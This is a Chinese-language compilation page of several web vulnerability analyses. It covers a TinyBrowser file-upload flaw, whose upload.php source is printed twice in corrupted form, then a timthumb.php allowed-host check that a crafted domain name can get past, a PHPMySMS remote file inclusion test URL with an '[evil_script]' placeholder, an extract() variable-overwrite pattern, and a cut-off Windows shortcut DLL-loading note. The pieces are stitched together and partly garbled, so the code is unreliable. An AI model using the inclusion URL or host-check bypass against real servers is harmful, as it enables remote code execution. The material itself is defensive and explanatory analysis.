以下是小编整理的TinyBrowser远程文件上传漏洞分析(共含6篇),仅供参考,希望能够帮助到大家。同时,但愿您也能像本文投稿人“gs429205”一样,积极向本站投稿分享好文章。
发布日期:-05.27
发布作者:Amxking
影响版本:未知
官方地址: www.lunarvis.com/products/tinymcefilebrowserwithupload.php
漏洞描述: 远程文件上传漏洞
下面我们来看upload.php程序代码
1
2 require_once('config_tinybrowser.php');
3 // Set language
4 if(isset($tinybrowser['language']) && file_exists('langs/'.$tinybrowser['language'].'.php'))
5 {
6 require_once('langs/'.$tinybrowser['language'].'.php');
7 }
8 else
9 {
10 require_once('langs/en.php'); // Falls back to English
11 }
12 require_once('fns_tinybrowser.php');
13
14 // Check session, if it exists
15 if(session_id != '')
16 {
17 if(!isset($_SESSION[$tinybrowser['sessioncheck']]))
18 {
19 echo TB_DENIED;
20 exit;
21 }
22 }
23
24 if(!$tinybrowser['allowupload'])
25 {
26 echo TB_UPDENIED;
27 exit;
28 }
29
30 // Assign get variables
31 $validtypes = array('image','media','file');
32 0now = ((isset($_GET['type']) && in_array($_GET['type'],$validtypes)) ? $_GET['type'] : 'image');
33 $foldernow = str_replace(array('../','..\\','./','.\\'),'',($tinybrowser['allowfolders'] && isset($_REQUEST['folder']) ? urldecode($_REQUEST['folder']) : ''));
34 $passfolder = '&folder='.urlencode($foldernow);
35 $passfeid = (isset($_GET['feid']) && $_GET['feid']!='' ? '&feid='.$_GET['feid'] : '');
36 $passupfeid = (isset($_GET['feid']) && $_GET['feid']!='' ? $_GET['feid'] : '');
37
38 // Assign upload path
39 $uploadpath = urlencode($tinybrowser['path'][0now].$foldernow);
40
41 // Assign directory structure to array
42 $uploaddirs=array();
43 dirtree($uploaddirs,$tinybrowser['filetype'][0now],$tinybrowser['docroot'],$tinybrowser['path'][0now]);
44
45 // determine file dialog file types
46 switch ($_GET['type'])
47 {
48 case 'image':
49 $filestr = TB_TYPEIMG;
50 break;
51 case 'media':
52 $filestr = TB_TYPEMEDIA;
53 break;
54 case 'file':
55 $filestr = TB_TYPEFILE;
56 break;
57 }
58 $fileexts = str_replace(“,”,“;”,$tinybrowser['filetype'][$_GET['type']]);
59 $filelist = $filestr.' ('.$tinybrowser['filetype'][$_GET['type']].')';
60
61 // Initalise alert array
62 $notify = array(
63 'type' =>array(),
64 'message' =>array()
65 );
66 $goodqty = (isset($_GET['goodfiles']) ? $_GET['goodfiles'] : 0);
67 $badqty = (isset($_GET['badfiles']) ? $_GET['badfiles'] : 0);
68 $dupqty = (isset($_GET['dupfiles']) ? $_GET['dupfiles'] : 0);
69
70 if($goodqty>0)
71 {
72 $notify['type'][]='success';
73 $notify['message'][]=sprintf(TB_MSGUPGOOD, $goodqty);
74 }
75 if($badqty>0)
76 {
77 $notify['type'][]='failure';
78 $notify['message'][]=sprintf(TB_MSGUPBAD, $badqty);
79 }
80 if($dupqty>0)
81 {
82 $notify['type'][]='failure';
83 $notify['message'][]=sprintf(TB_MSGUPDUP, $dupqty);
84 }
85 if(isset($_GET['permerror']))
86 {
87 $notify['type'][]='failure';
88 $notify['message'][]=sprintf(TB_MSGUPFAIL, $tinybrowser['docroot'].$tinybrowser['path'][0now]);
89 }
90 ?>
91
92
93
94 TinyBrowser ::
95
96
97
98 if($passfeid == '' && $tinybrowser['integration']=='tinymce')
99 {
100 ?>
101 }
102 else
103 {
104 ?>
105 }
106 ?>
107
108
109 <script. type=“text/javascript”>
From 情blog
程序描述:
TinyBrowser特点 根据配置可以设置是否允许上传、删除、编辑等操作等操作权限
支持多个上传,而且显示上传进度
可以简单编辑图片,比如旋转
可以根据图片名和缩略图列表查看文件
支持FCKeditor编辑器
漏洞分析:
下面我们来看upload.php程序代码
1
2 require_once(config_tinybrowser.php);
3 // Set language
4 if(isset($tinybrowser[language]) && file_exists(langs/.$tinybrowser[language]..php))
5 {
6 require_once(langs/.$tinybrowser[language]..php);
7 }
8 else
9 {
10 require_once(langs/en.php); // Falls back to English
11 }
12 require_once(fns_tinybrowser.php);
13
14 // Check session, if it exists
15 if(session_id() != )
16 {
17 if(!isset($_SESSION[$tinybrowser[sessioncheck]]))
18 {
19 echo TB_DENIED;
20 exit;
21 }
22 }
23
24 if(!$tinybrowser[allowupload])
25 {
26 echo TB_UPDENIED;
27 exit;
28 }
29
30 // Assign get variables
31 $validtypes = array(image,media,file);
32 0now = ((isset($_GET[type]) && in_array($_GET[type],$validtypes)) ? $_GET[type] : image);
33 $foldernow = str_replace(array(../,..\,./,.\),,($tinybrowser[allowfolders] && isset($_REQUEST[folder]) ? urldecode($_REQUEST[folder]) : ));
34 $passfolder = &folder=.urlencode($foldernow);
35 $passfeid = (isset($_GET[feid]) && $_GET[feid]!= ? &feid=.$_GET[feid] : );
36 $passupfeid = (isset($_GET[feid]) && $_GET[feid]!= ? $_GET[feid] : );
37
38 // Assign upload path
39 $uploadpath = urlencode($tinybrowser[path][0now].$foldernow);
40
41 // Assign directory structure to array
42 $uploaddirs=array();
43 dirtree($uploaddirs,$tinybrowser[filetype][0now],$tinybrowser[docroot],$tinybrowser[path][0now]);
44
45 // determine file dialog file types
46 switch ($_GET[type])
47 {
48 case image:
49 $filestr = TB_TYPEIMG;
50 break;
51 case media:
52 $filestr = TB_TYPEMEDIA;
53 break;
54 case file:
55 $filestr = TB_TYPEFILE;
56 break;
57 }
58 $fileexts = str_replace(“,”,“;”,$tinybrowser[filetype][$_GET[type]]);
59 $filelist = $filestr. (.$tinybrowser[filetype][$_GET[type]].);
60
61 // Initalise alert array
62 $notify = array(
63 type =>array(),
64 message =>array()
65 );
66 $goodqty = (isset($_GET[goodfiles]) ? $_GET[goodfiles] : 0);
67 $badqty = (isset($_GET[badfiles]) ? $_GET[badfiles] : 0);
68 $dupqty = (isset($_GET[dupfiles]) ? $_GET[dupfiles] : 0);
69
70 if($goodqty>0)
71 {
72 $notify[type][]=success;
73 $notify[message][]=sprintf(TB_MSGUPGOOD, $goodqty);
74 }
75 if($badqty>0)
76 {
77 $notify[type][]=failure;
78 $notify[message][]=sprintf(TB_MSGUPBAD, $badqty);
79 }
80 if($dupqty>0)
81 {
82 $notify[type][]=failure;
83 $notify[message][]=sprintf(TB_MSGUPDUP, $dupqty);
84 }
85 if(isset($_GET[permerror]))
86 {
87 $notify[type][]=failure;
88 $notify[message][]=sprintf(TB_MSGUPFAIL, $tinybrowser[docroot].$tinybrowser[path][0now]);
89 }
90 ?>
91
92
93
94 TinyBrowser ::
95
96
97
98 if($passfeid == && $tinybrowser[integration]==tinymce)
99 {
100 ?>
101 }
102 else
103 {
104 ?>
105 }
106 ?>
107
108
109
114
115
116 var so = new SWFObject(“flexupload.swf”, “mymovie”, “100%”, “340”, “9”, “#ffffff”);
117 so.addVariable(“folder”, “
118 so.addVariable(”uptype“, ”
119 so.addVariable(“destid”, “
120 so.addVariable(”maxsize“, ”
121 so.addVariable(“sessid”, “
122 so.addVariable(”obfus“, ”
123 so.addVariable(“filenames”, “
124 so.addVariable(”extensions“, ”
125 so.addVariable(“filenamelbl”, “
126 so.addVariable(”sizelbl“, ”
127 so.addVariable(“typelbl”, “
128 so.addVariable(”progresslbl“, ”
129 so.addVariable(“browselbl”, “
130 so.addVariable(”removelbl“, ”
131 so.addVariable(“uploadlbl”, “
来源:xuser.org/read.php?18
作者:xuser@fsafe
今天在微博上看见的关于wordpress出现了漏洞,随即赶紧打开相关页面分析具体原因,发现是timthumb.php远程存储文件时候的验证上不足而产生的漏洞,大概分析过程如下:
该文件对提交的src变量提交并验证后存储到服务器上
$src = get_request ('src', '');
利用parse_url ($src)将src进行url分割,然后进行验证
global $allowedSites;
// work out file details
$filename = 'external_' . md5 ($src);
$local_filepath = DIRECTORY_CACHE . '/' . $filename;
// only do this stuff the file doesn't already exist
if (!file_exists ($local_filepath)) {
if (strpos (strtolower ($src), '') !== false || strpos (strtolower ($src), '') !== false) {
if (!validate_url ($src)) {
display_error ('invalid url');
}
$url_info = parse_url ($src);
if (count (explode ('.', $url_info['path'])) >2) {
display_error ('source filename invalid');
}
if (($url_info['host'] == 'www. .com' || $url_info['host'] == ' .com') && preg_match ('/v=([^&]+)/i', $url_info['query'], $matches)) {
$v = $matches[1];
$src = 'img. .com/vi/' . $v . '/0.jpg';
$url_info['host'] = 'img. .com'; //如果来源是 ,则修改之前存储的host
}
$isAllowedSite = false;
// check allowed sites (if required)
if (ALLOW_EXTERNAL) { //ALLOW_EXTERNAL默认为false
$isAllowedSite = true;
} else {
foreach ($allowedSites as $site) {
if (strpos (strtolower ($url_info['host']), $site) !== false) //在$url_info['host'])查找是否存在$site
$isAllowedSite = true; //当为true就继续下一步的存储
}
}
}
其中$allowedSites数组在文件头定义如下
$allowedSites = array (
'flickr.com',
'pic.ruiwen.com',
'img. .com',
);
进过一系列的验证如果$isAllowedSite如果为真就开始存储这个文件到服务器上
if ($isAllowedSite) {
if (function_exists ('curl_init')) {
global $fh;
$fh = fopen ($local_filepath, 'w');
$ch = curl_init ($src);
curl_setopt ($ch, CURLOPT_TIMEOUT, CURL_TIMEOUT);
curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko/1107 Firefox/1.0');
curl_setopt ($ch, CURLOPT_URL, $src);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, TRUE);
curl_setopt ($ch, CURLOPT_HEADER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
curl_setopt ($ch, CURLOPT_FILE, $fh);
curl_setopt ($ch, CURLOPT_WRITEFUNCTION, 'curl_write');
// error so die
if (curl_exec ($ch) === FALSE) {
unlink ($local_filepath);
touch ($local_filepath);
display_error ('error reading file ' . $src . ' from remote host: ' . curl_error ($ch));
}
curl_close ($ch);
fclose ($fh);
// check it's actually an image
$file_infos = getimagesize ($local_filepath);
// no mime type or invalid mime type
if (empty ($file_infos['mime']) || !preg_match (”/jpg|jpeg|gif|png/i“, $file_infos['mime'])) {
unlink ($local_filepath);
touch ($local_filepath);
display_error ('remote file not a valid image');
}
} else {
if (!$img = file_get_contents ($src)) {
display_error ('remote file for ' . $src . ' can not be accessed. It is likely that the file permissions are restricted');
}
if (file_put_contents ($local_filepath, $img) == FALSE) {
display_error ('error writing temporary file');
}
}
if (!file_exists ($local_filepath)) {
display_error ('local file for ' . $src . ' can not be created');
}
$src = $local_filepath;
} else {
display_error ('remote host ”' . $url_info['host'] . '“ not allowed');
}
使用了strpos验证是否匹配列表中的条件应该是考虑到其分域名问题,不过也形成了一些安全隐患,例如pic.ruiwen.com.yourdomain.com也是符合这个匹配条件的,
关于存储文件的位置信息在如下代码中
$filename = 'external_' . md5 ($src);
$local_filepath = DIRECTORY_CACHE . '/' . $filename;
不过通过修改这个匹配规则或直接删除$isAllowedSite所有数组元素都可以临时解决该问题。
备注:发现一些timthumb.php版本中$isAllowedSite数组元素和存储文件方式不太一致,不过漏洞产生原因与此关系不是很大
受影响系统:
PhpMySms PhpMySms <= V2.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 18633
PHPMySMS是一款开放源码的用PHP实现的基于Web的短信解决方案,
PHPMySMS的实现上存在输入验证漏洞,远程攻击者可能利用此漏洞在服务器上执行任意命令。
远程攻击者可以利用PHPMySMS的gateway.php文件中的远程文件包含漏洞执行任意PHP代码。漏洞代码如下:
==============================================================
if (($_POST[mode] == ”1“) or ($_GET[mode] == ”1“)) {
include (”config.php“);
} else {
include (”$ROOT_PATH/config.php“);
}
==============================================================
<*来源:Persian-Defacer (www.Hacking-Boys.com)
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用,
使用者风险自负!
[site]/[sms location]/sms_config/gateway.php?ROOT_PATH=[evil_script]
建议:
--------------------------------------------------------------------------------
厂商补丁:
PhpMySms
--------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
Http://www.phpmysms.com
,
伪代码:
$rootdir = str_replace(”\\“, '/', dirname(__FILE__));
//下面就是require $rootdir.'/include/common.inc.php';引入的代码
@extract($_POST, EXTR_OVERWRITE);
@extract($_GET, EXTR_OVERWRITE);
unset($_POST, $_GET);
require $rootdir.'/web/admin/include/common.inc.php
?>
不知道看到这里,看官们有什么感想?如果这里用grep等软件去找静态的上跟踪这个的话障很再可能就会漏调着可能分析得到的结果是:
$rootdir = str_replace(”\\", '/', dirname(__FILE__));
require $rootdir.'/include/common.inc.php'
require $rootdir.'/web/admin/include/common.inc.php
一看$rootdir被过滤了,就会认为这里安全了?
所以一味的grep等静态去找,是找不到这样的bug的上...
来个“马后炮”,对于这样的上用灰盒测试可能效果很好:就是先看代码看common.inc.php这个躯干里发现用变量覆盖,然后黑盒去找跑那些变量可以覆盖.....
前言
windows的shell32在处理控制面板程序的快捷方式文件时,存在一个漏洞,可以加载硬盘上的任意DLL文件,即可执行任意代码,
漏洞文件的生成
到“控制面板”下面,右键点“显示”,点“创建快捷方式”,把快捷方式创建在桌面上,
然后在桌面用WinHex打开“显示.lnk”文件。
Offset0 1 2 3 4 5 6 7 8 9 A B C D E F
★ shopxp pinglun.asp文件SQL注入漏洞分析漏洞预警
★ dedecms 5.7 edit.inc.php文件注射漏洞预警
★ 火狐远程代码执行漏洞 Firefox 3.6.16漏洞预警
